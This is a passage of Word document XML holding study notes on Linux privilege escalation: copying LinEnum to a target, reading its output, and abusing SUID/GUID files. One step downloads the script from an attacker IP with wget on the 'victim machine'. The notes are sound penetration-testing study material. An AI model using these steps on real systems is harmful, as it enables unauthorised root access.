      <w:r w:rsidR="00D27325" w:rsidRPr="0084205E">
        <w:t xml:space="preserve">to manually enumerate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D27325" w:rsidRPr="0084205E">
        <w:t>privesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D27325" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> vulnerabilities in a situation where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D27325" w:rsidRPr="0084205E">
        <w:t>LinEnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D27325" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> is unavailable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548A8DA7" w14:textId="128B3FE0" w:rsidR="00D27325" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidR="00D27325" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="52E82BBC" w14:textId="23487FE7" w:rsidR="00D27325" w:rsidRPr="0084205E" w:rsidRDefault="00D27325" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">How to get </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>LinEnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> onto target machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBF72E7" w14:textId="77777777" w:rsidR="00D27325" w:rsidRPr="0084205E" w:rsidRDefault="00D27325" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Method 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5F83E8" w14:textId="2E564C72" w:rsidR="00D27325" w:rsidRPr="0084205E" w:rsidRDefault="00D27325" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">create python web server in directory where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>LinEnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> is stored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B2AEF9" w14:textId="056F303B" w:rsidR="00D27325" w:rsidRPr="0084205E" w:rsidRDefault="00D27325" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">“python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> 8000”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4195F451" w14:textId="159A051A" w:rsidR="00D27325" w:rsidRPr="0084205E" w:rsidRDefault="00D27325" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;attacker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;:&lt;port&gt;/LinEnum.sh – on victim machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C27CBA" w14:textId="03F46FB2" w:rsidR="00F437C7" w:rsidRPr="0084205E" w:rsidRDefault="00F437C7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">make sure </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> in a directory that the current user has permissions to write to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536DC100" w14:textId="7BC834AA" w:rsidR="00F437C7" w:rsidRPr="0084205E" w:rsidRDefault="00F437C7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ex.  /home/user/Documents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0BB972" w14:textId="37D3384B" w:rsidR="00D27325" w:rsidRPr="0084205E" w:rsidRDefault="00D27325" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Method 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D236B44" w14:textId="63F2C1FB" w:rsidR="00D27325" w:rsidRPr="0084205E" w:rsidRDefault="00D27325" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">copy raw </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>LinEnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> code from local machine and paste into new file on target using Vi or Nano</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730897FE" w14:textId="09CD7F7F" w:rsidR="00D27325" w:rsidRPr="0084205E" w:rsidRDefault="00D27325" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>save file with .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA0DF37" w14:textId="4D355A69" w:rsidR="00D27325" w:rsidRPr="0084205E" w:rsidRDefault="00D27325" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>make file executable with “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> +x &lt;filename.sh&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DA4D4E" w14:textId="0E9430AC" w:rsidR="00D27325" w:rsidRPr="0084205E" w:rsidRDefault="00D27325" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>LinEnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="661BFD37" w14:textId="4FBEE816" w:rsidR="00D27325" w:rsidRPr="0084205E" w:rsidRDefault="00D27325" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>go to directory where file is located and run command “./LinEnum.sh”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268A0EDE" w14:textId="32AD3922" w:rsidR="009D2F42" w:rsidRPr="0084205E" w:rsidRDefault="00D27325" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Understanding </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>LinEnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D2F42" w:rsidRPr="0084205E">
        <w:t>Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A759954" w14:textId="1E35297F" w:rsidR="009D2F42" w:rsidRPr="0084205E" w:rsidRDefault="009D2F42" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>broken into different sections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7885C1BA" w14:textId="68028988" w:rsidR="009D2F42" w:rsidRPr="0084205E" w:rsidRDefault="009D2F42" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Kernel – kernel information – kernel exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45979EB0" w14:textId="77777777" w:rsidR="009D2F42" w:rsidRPr="0084205E" w:rsidRDefault="009D2F42" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Can we read/write sensitive files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44630C3C" w14:textId="6076B8AD" w:rsidR="009D2F42" w:rsidRPr="0084205E" w:rsidRDefault="009D2F42" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>the world writable files are shown here – files that any authenticated user can read and write to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02201101" w14:textId="60A4C5B1" w:rsidR="009D2F42" w:rsidRPr="0084205E" w:rsidRDefault="009D2F42" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>by checking permissions, can see where there is misconfiguration that allows users to write to sensitive files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F893A1B" w14:textId="77777777" w:rsidR="009D2F42" w:rsidRPr="0084205E" w:rsidRDefault="009D2F42" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SUID Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E30066F" w14:textId="77777777" w:rsidR="009D2F42" w:rsidRPr="0084205E" w:rsidRDefault="009D2F42" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">special type of file permissions given to a file. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEA15B0" w14:textId="77777777" w:rsidR="009D2F42" w:rsidRPr="0084205E" w:rsidRDefault="009D2F42" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Allows the file to run with permissions of whoever the owner is – if root, runs with root privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C410359" w14:textId="312CD50A" w:rsidR="009D2F42" w:rsidRPr="0084205E" w:rsidRDefault="009D2F42" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>can allow for privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF5AC63" w14:textId="062EDDA2" w:rsidR="009D2F42" w:rsidRPr="0084205E" w:rsidRDefault="009D2F42" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Crontab Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF933BE" w14:textId="4D24B157" w:rsidR="009D2F42" w:rsidRPr="0084205E" w:rsidRDefault="009D2F42" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">scheduled </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> jobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B438FD" w14:textId="63D56A49" w:rsidR="009D2F42" w:rsidRPr="0084205E" w:rsidRDefault="009D2F42" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>schedules commands at a specific time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5B5CEC" w14:textId="3C251417" w:rsidR="009D2F42" w:rsidRPr="0084205E" w:rsidRDefault="009D2F42" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>warrants attempt of exploiting Cronjobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75809656" w14:textId="03F7A460" w:rsidR="00764503" w:rsidRPr="0084205E" w:rsidRDefault="00764503" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/crontab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E69997E" w14:textId="368F1B97" w:rsidR="00C14411" w:rsidRPr="0084205E" w:rsidRDefault="00C14411" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Abusing SUID/GUID files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B224E7E" w14:textId="6F7477DC" w:rsidR="00C14411" w:rsidRPr="0084205E" w:rsidRDefault="00C14411" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>first step in Linux privilege escalation is to check for files with SUID/GUID bit-set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62273273" w14:textId="040FBA47" w:rsidR="00C14411" w:rsidRPr="0084205E" w:rsidRDefault="00C14411" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>user files with super-user privilege to get a shell into root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A69F914" w14:textId="73A25AA7" w:rsidR="00C14411" w:rsidRPr="0084205E" w:rsidRDefault="00C14411" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SUID Binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367CA889" w14:textId="39B0EC6B" w:rsidR="00C14411" w:rsidRPr="0084205E" w:rsidRDefault="00C14411" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>everything in Linux is a file, each with read/write/execute permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536A951E" w14:textId="36C87C26" w:rsidR="00C14411" w:rsidRPr="0084205E" w:rsidRDefault="00C14411" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">ex. max privileges </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rwx-rwx-rwx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="444F8F1A" w14:textId="1E65C7D2" w:rsidR="00C14411" w:rsidRPr="0084205E" w:rsidRDefault="00C14411" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">max number of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>bit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> to be used to set permissions is 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AF830E" w14:textId="5B8C68FB" w:rsidR="00C14411" w:rsidRPr="0084205E" w:rsidRDefault="00C14411" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">however, when special permissions are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>given,becomes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> SUID/GUID – extra bit “4” is set to user it becomes SUID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A446D1" w14:textId="54FA2082" w:rsidR="00C14411" w:rsidRPr="0084205E" w:rsidRDefault="00C14411" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>when bit “2” is set to group it becomes SGID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABDF811" w14:textId="4CB2C0B7" w:rsidR="00C14411" w:rsidRPr="0084205E" w:rsidRDefault="00C14411" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">ex of SUID – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rws-rwx-rwx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00981D8D" w14:textId="09457579" w:rsidR="00C14411" w:rsidRPr="0084205E" w:rsidRDefault="00C14411" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
